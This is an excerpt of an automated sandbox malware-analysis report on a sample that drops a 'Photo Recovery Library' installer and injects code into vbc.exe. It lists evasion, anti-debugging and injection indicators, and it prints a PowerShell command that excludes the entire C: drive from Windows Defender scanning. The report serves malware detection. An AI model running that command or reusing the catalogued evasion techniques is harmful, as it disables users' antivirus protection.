            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2260Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\is-7OE1I.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\is-GR71V.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\libGLESv2.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\msvcr100.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\libEGL.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\is-AD2UI.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-B3MMC.tmp\_isetup\_shfoldr.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Windows\Temp\Hmas5kDc_8664.sysJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\is-MS967.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\is-HOEOG.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\uninstall\unins000.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\uninstall\is-DH20J.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-B3MMC.tmp\_isetup\_iscrypt.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-B3MMC.tmp\_isetup\_setup64.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\msvcp100.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\Qt5Concurrent.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\is-PG511.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\Qt5PrintSupport.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\icuuc51.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\is-6EQIQ.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\is-MLBF0.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\is-VMOUV.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\icuin51.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\1609a74d-2a2b-4f95-9570-07a864ac654e.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_7-5966
            Source: C:\Users\user\Desktop\12321321.exeAPI coverage: 6.7 %
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeAPI coverage: 4.8 %
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exe TID: 8656Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8848Thread sleep time: -13835058055282155s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9020Thread sleep time: -8301034833169293s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exe TID: 9144Thread sleep count: 39 > 30
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exe TID: 9144Thread sleep time: -78000s >= -30000s
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exe TID: 8596Thread sleep time: -900000s >= -30000s
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeFile opened: PhysicalDrive0
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\12321321.exeCode function: 0_2_0041F300 GetSystemTimeAdjustment followed by cmp: cmp ecx, 03h and CTI: jle 0041F313h0_2_0041F300
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_00452AD4 FindFirstFileA,GetLastError,8_2_00452AD4
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_00475798 FindFirstFileA,FindNextFileA,FindClose,8_2_00475798
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_0046417C SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,8_2_0046417C
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_004645F8 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,8_2_004645F8
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_00462BF0 FindFirstFileA,FindNextFileA,FindClose,8_2_00462BF0
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_00498FDC FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,8_2_00498FDC
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\1609a74d-2a2b-4f95-9570-07a864ac654e.exeCode function: 7_2_00409B78 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,7_2_00409B78
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeThread delayed: delay time: 60000
            Source: vbc.exe, 00000002.00000002.1417214646.000001C610F28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll-
            Source: 12321321.exe, 00000000.00000002.1416136932.00000000000AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW 6
            Source: 12321321.exe, 00000000.00000002.1416136932.00000000000AC000.00000004.00000020.00020000.00000000.sdmp, 12321321.exe, 00000000.00000002.1416136932.0000000000135000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib.exe, 0000000A.00000002.2563243952.0000000000958000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib.exe, 0000000A.00000002.2564708817.0000000003542000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\1609a74d-2a2b-4f95-9570-07a864ac654e.exeAPI call chain: ExitProcess graph end nodegraph_7-6763
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeAPI call chain: ExitProcess graph end nodegraph_10-61108
            Source: C:\Users\user\Desktop\12321321.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
            Source: C:\Users\user\Desktop\12321321.exeCode function: 0_2_004029E0 GetCurrentProcess,CheckRemoteDebuggerPresent,0_2_004029E0
            Source: C:\Users\user\Desktop\12321321.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\12321321.exeCode function: 0_2_00404810 IsDebuggerPresent,0_2_00404810
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_02DDE6BE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,10_2_02DDE6BE
            Source: C:\Users\user\Desktop\12321321.exeCode function: 0_2_00402890 LoadLibraryA,GetProcAddress,GetCurrentThread,FreeLibrary,0_2_00402890
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_02DC5E59 RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,10_2_02DC5E59
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\12321321.exeCode function: 0_2_004011DC SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,_initterm,exit,0_2_004011DC
            Source: C:\Users\user\Desktop\12321321.exeCode function: 0_2_00401180 Sleep,SetUnhandledExceptionFilter,malloc,_initterm,GetStartupInfoA,0_2_00401180
            Source: C:\Users\user\Desktop\12321321.exeCode function: 0_2_0041D6A0 TlsGetValue,CloseHandle,CloseHandle,CloseHandle,RtlRemoveVectoredExceptionHandler,RtlAddVectoredExceptionHandler,CloseHandle,CloseHandle,TlsSetValue,CloseHandle,0_2_0041D6A0
            Source: C:\Users\user\Desktop\12321321.exeCode function: 0_2_0040F9F0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,0_2_0040F9F0
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_02DD80E8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_02DD80E8
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\Jump to behavior
            Allocates memory in foreign processes
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeMemory allocated: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe base: 140000000 protect: page execute and read and writeJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe base: 140000000 value starts with: 4D5AJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeThread register set: target process: 8664Jump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe base: 140000000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe base: 140001000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe base: 14007F000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe base: 140095000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe base: 1400A0000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe base: 1400A5000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe base: 140186000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe base: 14026E000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe base: 14026F000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe base: 140563000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe base: 9039A53010Jump to behavior
            Source: C:\Users\user\Desktop\12321321.exeCode function: 0_2_00402460 GetModuleFileNameA,ShellExecuteEx,GetLastError,CreateThread,0_2_00402460
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_0042EE28 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA,8_2_0042EE28
            Source: C:\Users\user\Desktop\12321321.exeCode function: 0_2_00420391 AllocateAndInitializeSid,0_2_00420391
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_02DCE86A cpuid 10_2_02DCE86A
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\1609a74d-2a2b-4f95-9570-07a864ac654e.exeCode function: GetLocaleInfoA,7_2_0040520C
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\1609a74d-2a2b-4f95-9570-07a864ac654e.exeCode function: GetLocaleInfoA,7_2_00405258
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: GetLocaleInfoA,8_2_00408578
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: GetLocaleInfoA,8_2_004085C4
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exe VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
